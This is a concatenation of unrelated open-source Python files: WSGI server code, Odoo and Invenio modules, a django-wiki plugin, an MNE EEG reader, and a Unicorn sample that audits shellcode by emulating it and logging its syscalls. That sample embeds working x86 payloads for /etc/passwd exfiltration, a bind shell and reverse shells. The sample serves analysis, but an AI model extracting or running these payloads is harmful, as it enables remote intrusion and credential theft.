# Whew. We can send a 500 to the client.
self.req.simple_response("500 Internal Server Error",
"The requested resource returned more bytes than the "
"declared Content-Length.")
else:
# Dang. We have probably already sent data. Truncate the chunk
# to fit (so the client doesn't hang) and raise an error later.
chunk = chunk[:rbo]
if not self.req.sent_headers:
self.req.sent_headers = True
self.req.send_headers()
self.req.write(chunk)
if rbo is not None:
rbo -= chunklen
if rbo < 0:
raise ValueError(
"Response body exceeds the declared Content-Length.")
class WSGIGateway_10(WSGIGateway):
"""A Gateway class to interface HTTPServer with WSGI 1.0.x."""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env = {
# set a non-standard environ entry so the WSGI app can know what
# the *real* server protocol is (and what features to support).
# See http://www.faqs.org/rfcs/rfc2145.html.
'ACTUAL_SERVER_PROTOCOL': req.server.protocol,
'PATH_INFO': req.path.decode('ISO-8859-1'),
'QUERY_STRING': req.qs.decode('ISO-8859-1'),
'REMOTE_ADDR': req.conn.remote_addr or '',
'REMOTE_PORT': str(req.conn.remote_port or ''),
'REQUEST_METHOD': req.method.decode('ISO-8859-1'),
'REQUEST_URI': req.uri,
'SCRIPT_NAME': '',
'SERVER_NAME': req.server.server_name,
# Bah. "SERVER_PROTOCOL" is actually the REQUEST protocol.
'SERVER_PROTOCOL': req.request_protocol.decode('ISO-8859-1'),
'SERVER_SOFTWARE': req.server.software,
'wsgi.errors': sys.stderr,
'wsgi.input': req.rfile,
'wsgi.multiprocess': False,
'wsgi.multithread': True,
'wsgi.run_once': False,
'wsgi.url_scheme': req.scheme.decode('ISO-8859-1'),
'wsgi.version': (1, 0),
}
if isinstance(req.server.bind_addr, basestring):
# AF_UNIX. This isn't really allowed by WSGI, which doesn't
# address unix domain sockets. But it's better than nothing.
env["SERVER_PORT"] = ""
else:
env["SERVER_PORT"] = str(req.server.bind_addr[1])
# Request headers
for k, v in req.inheaders.items():
k = k.decode('ISO-8859-1').upper().replace("-", "_")
env["HTTP_" + k] = v.decode('ISO-8859-1')
# CONTENT_TYPE/CONTENT_LENGTH
ct = env.pop("HTTP_CONTENT_TYPE", None)
if ct is not None:
env["CONTENT_TYPE"] = ct
cl = env.pop("HTTP_CONTENT_LENGTH", None)
if cl is not None:
env["CONTENT_LENGTH"] = cl
if req.conn.ssl_env:
env.update(req.conn.ssl_env)
return env
class WSGIGateway_u0(WSGIGateway_10):
"""A Gateway class to interface HTTPServer with WSGI u.0.
WSGI u.0 is an experimental protocol, which uses unicode for keys and values
in both Python 2 and Python 3.
"""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env_10 = WSGIGateway_10.get_environ(self)
env = env_10.copy()
env['wsgi.version'] = ('u', 0)
# Request-URI
env.setdefault('wsgi.url_encoding', 'utf-8')
try:
# SCRIPT_NAME is the empty string, who cares what encoding it is?
env["PATH_INFO"] = req.path.decode(env['wsgi.url_encoding'])
env["QUERY_STRING"] = req.qs.decode(env['wsgi.url_encoding'])
except UnicodeDecodeError:
# Fall back to latin 1 so apps can transcode if needed.
env['wsgi.url_encoding'] = 'ISO-8859-1'
env["PATH_INFO"] = env_10["PATH_INFO"]
env["QUERY_STRING"] = env_10["QUERY_STRING"]
return env
wsgi_gateways = {
(1, 0): WSGIGateway_10,
('u', 0): WSGIGateway_u0,
}
class WSGIPathInfoDispatcher(object):
"""A WSGI dispatcher for dispatch based on the PATH_INFO.
apps: a dict or list of (path_prefix, app) pairs.
"""
def __init__(self, apps):
try:
apps = list(apps.items())
except AttributeError:
pass
# Sort the apps by len(path_prefix), descending, so the longest
# (most specific) prefix is tried first.
apps.sort(key=lambda pair: len(pair[0]), reverse=True)
# The path_prefix strings must start, but not end, with a slash.
# Use "" instead of "/".
self.apps = [(p.rstrip("/"), a) for p, a in apps]
def __call__(self, environ, start_response):
path = environ["PATH_INFO"] or "/"
for p, app in self.apps:
# The apps list should be sorted by length, descending.
if path.startswith(p + "/") or path == p:
environ = environ.copy()
environ["SCRIPT_NAME"] = environ["SCRIPT_NAME"] + p
environ["PATH_INFO"] = path[len(p):]
return app(environ, start_response)
start_response('404 Not Found', [('Content-Type', 'text/plain'),
('Content-Length', '0')])
return ['']
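# Hedged usage sketch (illustrative, not part of the original module): mount
# two hypothetical WSGI apps by path prefix; the longest prefix wins, so
# /admin/users is routed to `admin` and everything else to `site`.
def _example_dispatcher():
    def site(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return ['site']
    def admin(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return ['admin']
    return WSGIPathInfoDispatcher({'/': site, '/admin': admin})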
| apache-2.0 |
allenp/odoo | addons/website_forum/tests/common.py | 13 | 3559 | # -*- coding: utf-8 -*-
from openerp.tests import common
KARMA = {
'ask': 5, 'ans': 10,
'com_own': 5, 'com_all': 10,
'com_conv_all': 50,
'upv': 5, 'dwv': 10,
'edit_own': 10, 'edit_all': 20,
'close_own': 10, 'close_all': 20,
'unlink_own': 10, 'unlink_all': 20,
'post': 100, 'flag': 500, 'moderate': 1000,
'gen_que_new': 1, 'gen_que_upv': 5, 'gen_que_dwv': -10,
'gen_ans_upv': 10, 'gen_ans_dwv': -20,
}
class TestForumCommon(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestForumCommon, cls).setUpClass()
Forum = cls.env['forum.forum']
Post = cls.env['forum.post']
# Test users
TestUsersEnv = cls.env['res.users'].with_context({'no_reset_password': True})
group_employee_id = cls.env.ref('base.group_user').id
group_portal_id = cls.env.ref('base.group_portal').id
group_public_id = cls.env.ref('base.group_public').id
cls.user_employee = TestUsersEnv.create({
'name': 'Armande Employee',
'login': 'Armande',
'alias_name': 'armande',
'email': 'armande.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_employee_id])]
})
cls.user_portal = TestUsersEnv.create({
'name': 'Beatrice Portal',
'login': 'Beatrice',
'alias_name': 'beatrice',
'email': 'beatrice.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_portal_id])]
})
cls.user_public = TestUsersEnv.create({
'name': 'Cedric Public',
'login': 'Cedric',
'alias_name': 'cedric',
'email': 'cedric.employee@example.com',
'karma': 0,
'groups_id': [(6, 0, [group_public_id])]
})
# Test forum
cls.forum = Forum.create({
'name': 'TestForum',
'karma_ask': KARMA['ask'],
'karma_answer': KARMA['ans'],
'karma_comment_own': KARMA['com_own'],
'karma_comment_all': KARMA['com_all'],
'karma_answer_accept_own': 9999,
'karma_answer_accept_all': 9999,
'karma_upvote': KARMA['upv'],
'karma_downvote': KARMA['dwv'],
'karma_edit_own': KARMA['edit_own'],
'karma_edit_all': KARMA['edit_all'],
'karma_close_own': KARMA['close_own'],
'karma_close_all': KARMA['close_all'],
'karma_unlink_own': KARMA['unlink_own'],
'karma_unlink_all': KARMA['unlink_all'],
'karma_post': KARMA['post'],
'karma_comment_convert_all': KARMA['com_conv_all'],
'karma_gen_question_new': KARMA['gen_que_new'],
'karma_gen_question_upvote': KARMA['gen_que_upv'],
'karma_gen_question_downvote': KARMA['gen_que_dwv'],
'karma_gen_answer_upvote': KARMA['gen_ans_upv'],
'karma_gen_answer_downvote': KARMA['gen_ans_dwv'],
'karma_gen_answer_accept': 9999,
'karma_gen_answer_accepted': 9999,
})
cls.post = Post.create({
'name': 'TestQuestion',
'content': 'I am not a bird.',
'forum_id': cls.forum.id,
'tag_ids': [(0, 0, {'name': 'Tag2', 'forum_id': cls.forum.id})]
})
cls.answer = Post.create({
'name': 'TestAnswer',
'content': 'I am an anteater.',
'forum_id': cls.forum.id,
'parent_id': cls.post.id,
})
| gpl-3.0 |
labordoc/labordoc-next | modules/miscutil/lib/web_api_key.py | 2 | 4341 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Invenio utilities to perform REST-like authentication.
"""
from invenio.access_control_config import CFG_WEB_API_KEY_STATUS
from invenio.web_api_key_model import WebAPIKey
def create_new_web_api_key(uid, key_description=None):
"""
Creates a new REST API key / secret key pair for the user, generated
with the uuid4 function.
@param uid: User's id for the new REST API key
@type uid: int
@param key_description: User's description for the REST API key
@type key_description: string
"""
WebAPIKey.create_new(uid, key_description)
def show_web_api_keys(uid, diff_status=CFG_WEB_API_KEY_STATUS['REMOVED']):
"""
Makes a query to the DB to obtain all the user's REST API keys
@param uid: User's id
@type uid: int
@param diff_status: This string indicates if the query will show
all the REST API keys or only the ones that are still active (useful in
the admin part)
@type diff_status: string
"""
return WebAPIKey.show_keys(uid, diff_status)
def mark_web_api_key_as_removed(key_id):
"""
When the user wants to remove one of their keys, this function sets the
status of that key to REMOVED. This way the user doesn't see the key
anymore, but the admin user still sees it, can compute statistics with it, etc.
@param key_id: The id of the REST key that will be "removed"
@type key_id: string
"""
WebAPIKey.mark_as(key_id, CFG_WEB_API_KEY_STATUS['REMOVED'])
def get_available_web_api_keys(uid):
"""
Search for all the available REST API keys, i.e. all the user's keys that
are not marked as REMOVED or REVOKED
@param uid: The user id
@type uid: int
@return: WebAPIKey objects
"""
return WebAPIKey.get_available(uid)
def acc_get_uid_from_request():
"""
Looks in the database for the secret that matches the API key in the
request. If the REST API key is found and the signature is correct,
returns the user's id.
@return: the user's uid if everything goes well, -1 if not
"""
return WebAPIKey.acc_get_uid_from_request()
def build_web_request(path, params=None, uid=-1, api_key=None, timestamp=True):
"""
Build a new request that uses REST authentication.
1. Add your REST API key to the params
2. Add the current timestamp to the params, if needed
3. Sort the query string params
4. Merge path and the sorted query string to a single string
5. Create a HMAC-SHA1 signature of this string
using your secret key as the key
6. Append the hex-encoded signature to your query string
@note: If the api_key parameter is None, then this method performs a search
in the database using the uid parameter to get one of the user's REST
API keys. If the user has one or more usable REST API keys, this method
uses the first one found.
@param path: uri of the request until the "?" (i.e.: /search)
@type path: string
@param params: All the params of the request (i.e.: req.args or a dictionary
with the param name as key)
@type params: string or dict
@param api_key: User REST API key
@type api_key: string
@param uid: User's id to do the search for the REST API key
@type uid: int
@param timestamp: Indicates if timestamp is needed in the request
@type timestamp: boolean
@return: Signed request string or, in case of error, ''
"""
return WebAPIKey.build_web_request(path, params, uid, api_key, timestamp)
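# Hedged sketch (illustrative, not part of Invenio): the signing recipe from
# the docstring above, using only the standard library. The 'apikey' and
# 'signature' parameter names are assumptions made for illustration.
def _example_build_web_request(path, params, api_key, secret_key):
    import hashlib
    import hmac
    import time
    from urllib import urlencode  # Python 2, matching the module above
    params = dict(params or {})
    params['apikey'] = api_key                     # 1. add the REST API key
    params['timestamp'] = str(int(time.time()))    # 2. add the timestamp
    query = urlencode(sorted(params.items()))      # 3./4. sort and merge
    url = '%s?%s' % (path, query)
    signature = hmac.new(secret_key, url, hashlib.sha1).hexdigest()  # 5.
    return '%s&signature=%s' % (url, signature)    # 6. append hex signature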
| gpl-2.0 |
a-nai/django-wiki | wiki/plugins/images/wiki_plugin.py | 2 | 3205 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django.utils.translation import ugettext as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.images import views, models, settings, forms
from wiki.plugins.notifications.settings import ARTICLE_EDIT
from wiki.plugins.notifications.util import truncate_title
from wiki.plugins.images.markdown_extensions import ImageExtension
class ImagePlugin(BasePlugin):
slug = settings.SLUG
sidebar = {
'headline': _('Images'),
'icon_class': 'fa-picture-o',
'template': 'wiki/plugins/images/sidebar.html',
'form_class': forms.SidebarForm,
'get_form_kwargs': (lambda a: {'instance': models.Image(article=a)})
}
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [
{'model': models.ImageRevision,
'message': lambda obj: _("An image was added: %s") % truncate_title(obj.get_filename()),
'key': ARTICLE_EDIT,
'created': False,
# Ignore if there is a previous revision... the image isn't new
'ignore': lambda revision: bool(revision.previous_revision),
'get_article': lambda obj: obj.article}
]
class RenderMedia:
js = [
'wiki/colorbox/jquery.colorbox-min.js',
'wiki/js/images.js',
]
css = {
'screen': 'wiki/colorbox/example1/colorbox.css'
}
urlpatterns = {'article': patterns('',
url('^$',
views.ImageView.as_view(),
name='images_index'),
url(r'^delete/(?P<image_id>\d+)/$',
views.DeleteView.as_view(),
name='images_delete'),
url(r'^restore/(?P<image_id>\d+)/$',
views.DeleteView.as_view(),
name='images_restore',
kwargs={'restore': True}),
url(r'^purge/(?P<image_id>\d+)/$',
views.PurgeView.as_view(),
name='images_purge'),
url(r'^(?P<image_id>\d+)/revision/change/(?P<rev_id>\d+)/$',
views.RevisionChangeView.as_view(),
name='images_restore'),
url(r'^(?P<image_id>\d+)/revision/add/$',
views.RevisionAddView.as_view(),
name='images_add_revision'),
)}
markdown_extensions = [ImageExtension()]
def __init__(self):
# print "I WAS LOADED!"
pass
registry.register(ImagePlugin)
| gpl-3.0 |
xorstream/unicorn | bindings/python/sample_network_auditing.py | 7 | 12371 | #!/usr/bin/env python
# Unicorn sample for auditing network connection and file handling in shellcode.
# Nguyen Tan Cong <shenlongbk@gmail.com>
from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import struct
import uuid
SIZE_REG = 4
SOCKETCALL_MAX_ARGS = 3
SOCKET_TYPES = {
1: "SOCK_STREAM",
2: "SOCK_DGRAM",
3: "SOCK_RAW",
4: "SOCK_RDM",
5: "SOCK_SEQPACKET",
10: "SOCK_PACKET"
}
ADDR_FAMILY = {
0: "AF_UNSPEC",
1: "AF_UNIX",
2: "AF_INET",
3: "AF_AX25",
4: "AF_IPX",
5: "AF_APPLETALK",
6: "AF_NETROM",
7: "AF_BRIDGE",
8: "AF_AAL5",
9: "AF_X25",
10: "AF_INET6",
12: "AF_MAX"
}
# http://shell-storm.org/shellcode/files/shellcode-861.php
X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
# http://shell-storm.org/shellcode/files/shellcode-882.php
X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-883.php
X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-849.php
X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"
# memory address where emulation starts
ADDRESS = 0x1000000
# supported classes
class IdGenerator:
def __init__(self):
self.__next_id = 3 # exclude stdin, stdout, stderr
def next(self):
next_id = self.__next_id
self.__next_id += 1
return next_id
class LogChain:
def __init__(self):
self.__chains = {}
self.__linking_fds = {}
def clean(self):
self.__chains = {}
self.__linking_fds = {}
def create_chain(self, my_id):
if not my_id in self.__chains:
self.__chains[my_id] = []
else:
print("LogChain: id %d existed" % my_id)
def add_log(self, id, msg):
fd = self.get_original_fd(id)
if fd is not None:
self.__chains[fd].append(msg)
else:
print("LogChain: id %d doesn't exist" % id)
def link_fd(self, from_fd, to_fd):
if not to_fd in self.__linking_fds:
self.__linking_fds[to_fd] = []
self.__linking_fds[to_fd].append(from_fd)
def get_original_fd(self, fd):
if fd in self.__chains:
return fd
for orig_fd, links in self.__linking_fds.items():
if fd in links:
return orig_fd
return None
def print_report(self):
print("""
----------------
| START REPORT |
----------------
""")
for my_id, logs in self.__chains.items():
print("---- START FD(%d) ----" % my_id)
print("\n".join(logs))
print("---- END FD(%d) ----" % my_id)
print("""
--------------
| END REPORT |
--------------
""")
# end supported classes
# utilities
def bin_to_ipv4(ip):
return "%d.%d.%d.%d" % (
(ip & 0xff000000) >> 24,
(ip & 0xff0000) >> 16,
(ip & 0xff00) >> 8,
(ip & 0xff))
def read_string(uc, addr):
ret = ""
c = uc.mem_read(addr, 1)[0]
read_bytes = 1
while c != 0x0:
ret += chr(c)
c = uc.mem_read(addr + read_bytes, 1)[0]
read_bytes += 1
return ret
def parse_sock_address(sock_addr):
sin_family, = struct.unpack("<h", sock_addr[:2])
if sin_family == 2: # AF_INET
port, host = struct.unpack(">HI", sock_addr[2:8])
return "%s:%d" % (bin_to_ipv4(host), port)
elif sin_family == 10: # AF_INET6
return ""
def print_sockcall(msg):
print(">>> SOCKCALL %s" % msg)
# end utilities
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))
# read this instruction code from memory
tmp = uc.mem_read(address, size)
print(">>> Instruction code at [0x%x] =" % (address), end="")
for i in tmp:
print(" %x" % i, end="")
print("")
# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
global id_gen
# only handle Linux syscall
if intno != 0x80:
return
eax = uc.reg_read(UC_X86_REG_EAX)
ebx = uc.reg_read(UC_X86_REG_EBX)
ecx = uc.reg_read(UC_X86_REG_ECX)
edx = uc.reg_read(UC_X86_REG_EDX)
eip = uc.reg_read(UC_X86_REG_EIP)
# print(">>> INTERRUPT %d" % eax)
if eax == 1: # sys_exit
print(">>> SYS_EXIT")
uc.emu_stop()
elif eax == 3: # sys_read
fd = ebx
buf = ecx
count = edx
dummy_content = str(uuid.uuid1()).encode("latin1")[:32]
if len(dummy_content) > count:
dummy_content = dummy_content[:count]
uc.mem_write(buf, dummy_content)
msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content)
fd_chains.add_log(fd, msg)
print(">>> %s" % msg)
elif eax == 4: # sys_write
fd = ebx
buf = ecx
count = edx
content = uc.mem_read(buf, count)
msg = "write data=%s count=%d to fd(%d)" % (content, count, fd)
print(">>> %s" % msg)
fd_chains.add_log(fd, msg)
elif eax == 5: # sys_open
filename_addr = ebx
flags = ecx
mode = edx
filename = read_string(uc, filename_addr)
dummy_fd = id_gen.next()
uc.reg_write(UC_X86_REG_EAX, dummy_fd)
msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd)
fd_chains.create_chain(dummy_fd)
fd_chains.add_log(dummy_fd, msg)
print(">>> %s" % msg)
elif eax == 11: # sys_execve
# print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx))
filename = read_string(uc, ebx)
print(">>> SYS_EXECV filename=%s" % filename)
elif eax == 63: # sys_dup2
fd_chains.link_fd(ecx, ebx)
print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx))
elif eax == 102: # sys_socketcall
# ref: http://www.skyfree.org/linux/kernel_network/socket.html
call = uc.reg_read(UC_X86_REG_EBX)
args = uc.reg_read(UC_X86_REG_ECX)
SOCKETCALL_NUM_ARGS = {
1: 3, # sys_socket
2: 3, # sys_bind
3: 3, # sys_connect
4: 2, # sys_listen
5: 3, # sys_accept
9: 4, # sys_send
10: 4, # sys_recv
13: 2 # sys_shutdown
}
buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG)
args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf)
# int sys_socketcall(int call, unsigned long *args)
if call == 1: # sys_socket
# err = sys_socket(a0,a1,a[2])
# int sys_socket(int family, int type, int protocol)
family = args[0]
sock_type = args[1]
protocol = args[2]
dummy_fd = id_gen.next()
uc.reg_write(UC_X86_REG_EAX, dummy_fd)
if family == 2: # AF_INET
msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd)
fd_chains.create_chain(dummy_fd)
fd_chains.add_log(dummy_fd, msg)
print_sockcall(msg)
elif family == 3: # AF_INET6
pass
elif call == 2: # sys_bind
fd = args[0]
umyaddr = args[1]
addrlen = args[2]
sock_addr = uc.mem_read(umyaddr, addrlen)
msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 3: # sys_connect
# err = sys_connect(a0, (struct sockaddr *)a1, a[2])
# int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen)
fd = args[0]
uservaddr = args[1]
addrlen = args[2]
sock_addr = uc.mem_read(uservaddr, addrlen)
msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 4: # sys_listen
fd = args[0]
backlog = args[1]
msg = "fd(%d) listened with backlog=%d" % (fd, backlog)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 5: # sys_accept
fd = args[0]
upeer_sockaddr = args[1]
upeer_addrlen = args[2]
# print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen))
if upeer_sockaddr == 0x0:
print_sockcall("fd(%d) accept client" % fd)
else:
upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4))
sock_addr = uc.mem_read(upeer_sockaddr, upeer_len)
msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr))
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 9: # sys_send
fd = args[0]
buff = args[1]
length = args[2]
flags = args[3]
buf = uc.mem_read(buff, length)
msg = "fd(%d) send data=%s" % (fd, buf)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 10: # sys_recv
fd = args[0]
ubuf = args[1]
size = args[2]
flags = args[3]
msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
elif call == 13: # sys_shutdown
fd = args[0]
how = args[1]
msg = "fd(%d) is shutted down because of %d" % (fd, how)
fd_chains.add_log(fd, msg)
print_sockcall(msg)
# Test X86 32 bit
def test_i386(code):
global fd_chains
fd_chains.clean()
print("Emulate i386 code")
try:
# Initialize emulator in X86-32bit mode
mu = Uc(UC_ARCH_X86, UC_MODE_32)
# map 2MB memory for this emulation
mu.mem_map(ADDRESS, 2 * 1024 * 1024)
# write machine code to be emulated to memory
mu.mem_write(ADDRESS, code)
# initialize stack
mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)
# tracing all instructions with customized callback
# mu.hook_add(UC_HOOK_CODE, hook_code)
# handle interrupt ourself
mu.hook_add(UC_HOOK_INTR, hook_intr)
# emulate machine code in infinite time
mu.emu_start(ADDRESS, ADDRESS + len(code))
# now print out some registers
print(">>> Emulation done")
except UcError as e:
print("ERROR: %s" % e)
fd_chains.print_report()
# Globals
fd_chains = LogChain()
id_gen = IdGenerator()
if __name__ == '__main__':
test_i386(X86_SEND_ETCPASSWD)
test_i386(X86_BIND_TCP)
test_i386(X86_REVERSE_TCP)
test_i386(X86_REVERSE_TCP_2)
| gpl-2.0 |
andyh616/mne-python | mne/io/egi/egi.py | 5 | 13219 | # Authors: Denis A. Engemann <denis.engemann@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# simplified BSD-3 license
import datetime
import time
import warnings
import numpy as np
from ..base import _BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..constants import FIFF
from ...utils import verbose, logger
def _read_header(fid):
"""Read EGI binary header"""
version = np.fromfile(fid, np.int32, 1)[0]
if version > 6 and not np.bitwise_and(version, 6):
version = version.byteswap().astype(np.uint32)
elif not np.bitwise_and(version, 6):
raise ValueError('Watch out. This does not seem to be a simple '
'binary EGI file.')
def my_fread(*x, **y):
return np.fromfile(*x, **y)[0]
info = dict(
version=version,
year=my_fread(fid, '>i2', 1),
month=my_fread(fid, '>i2', 1),
day=my_fread(fid, '>i2', 1),
hour=my_fread(fid, '>i2', 1),
minute=my_fread(fid, '>i2', 1),
second=my_fread(fid, '>i2', 1),
millisecond=my_fread(fid, '>i4', 1),
samp_rate=my_fread(fid, '>i2', 1),
n_channels=my_fread(fid, '>i2', 1),
gain=my_fread(fid, '>i2', 1),
bits=my_fread(fid, '>i2', 1),
value_range=my_fread(fid, '>i2', 1)
)
unsegmented = 1 if np.bitwise_and(version, 1) == 0 else 0
precision = np.bitwise_and(version, 6)
if precision == 0:
raise RuntimeError('Floating point precision is undefined.')
if unsegmented:
info.update(dict(n_categories=0,
n_segments=1,
n_samples=np.fromfile(fid, '>i4', 1)[0],
n_events=np.fromfile(fid, '>i2', 1)[0],
event_codes=[],
category_names=[],
category_lengths=[],
pre_baseline=0))
for event in range(info['n_events']):
event_codes = ''.join(np.fromfile(fid, 'S1', 4).astype('U1'))
info['event_codes'].append(event_codes)
info['event_codes'] = np.array(info['event_codes'])
else:
raise NotImplementedError('Only continuous files are supported')
info.update(dict(precision=precision, unsegmented=unsegmented))
return info
def _read_events(fid, info):
"""Read events"""
unpack = [info[k] for k in ['n_events', 'n_segments', 'n_channels']]
n_events, n_segments, n_channels = unpack
n_samples = 1 if info['unsegmented'] else info['n_samples']
events = np.zeros([n_events, n_segments * info['n_samples']])
dtype, bytesize = {2: ('>i2', 2), 4: ('>f4', 4),
6: ('>f8', 8)}[info['precision']]
info.update({'dtype': dtype, 'bytesize': bytesize})
beg_dat = fid.tell()
for ii in range(info['n_events']):
fid.seek(beg_dat + (int(n_channels) + ii) * bytesize, 0)
events[ii] = np.fromfile(fid, dtype, n_samples)
fid.seek(int((n_channels + n_events) * bytesize), 1)
return events
def _read_data(fid, info):
"""Aux function"""
if not info['unsegmented']:
raise NotImplementedError('Only continuous files are supported')
fid.seek(36 + info['n_events'] * 4, 0) # skip header
readsize = (info['n_channels'] + info['n_events']) * info['n_samples']
final_shape = (info['n_samples'], info['n_channels'] + info['n_events'])
data = np.fromfile(fid, info['dtype'], readsize).reshape(final_shape).T
return data
def _combine_triggers(data, remapping=None):
"""Combine binary triggers"""
new_trigger = np.zeros(data[0].shape)
first = np.nonzero(data[0])[0]
for d in data[1:]:
if np.intersect1d(d.nonzero()[0], first).any():
raise RuntimeError('Events must be mutually exclusive')
if remapping is None:
remapping = np.arange(len(data)) + 1
for d, event_id in zip(data, remapping):
idx = d.nonzero()
if np.any(idx):
new_trigger[idx] += event_id
return new_trigger[None]
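# Hedged self-check (illustrative, not part of the original module): two
# mutually exclusive binary event channels merged into a single synthetic
# trigger, with events renumbered 1 and 2 via the remapping argument.
def _example_combine_triggers():
    chans = np.array([[0, 1, 0, 0],
                      [0, 0, 1, 0]])
    return _combine_triggers(chans, remapping=[1, 2])  # -> [[0., 1., 2., 0.]]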
@verbose
def read_raw_egi(input_fname, montage=None, eog=None, misc=None,
include=None, exclude=None, verbose=None):
"""Read EGI simple binary as raw object
Note. The trigger channel names are based on the
arbitrary user dependent event codes used. However this
function will attempt to generate a synthetic trigger channel
named ``STI 014`` in accordance with the general Neuromag / MNE
naming pattern.
The event_id assignment equals np.arange(n_events - n_excluded) + 1.
The resulting `event_id` mapping is stored as an attribute of
the resulting raw object but will be ignored when saving to a fiff.
Note. The trigger channel is artificially constructed based on
timestamps received by the Netstation. As a consequence, triggers
have only short durations.
This step will fail if events are not mutually exclusive.
Parameters
----------
input_fname : str
Path to the raw file.
montage : str | None | instance of montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list or tuple
Names of channels or list of indices that should be designated
EOG channels. Default is None.
misc : list or tuple
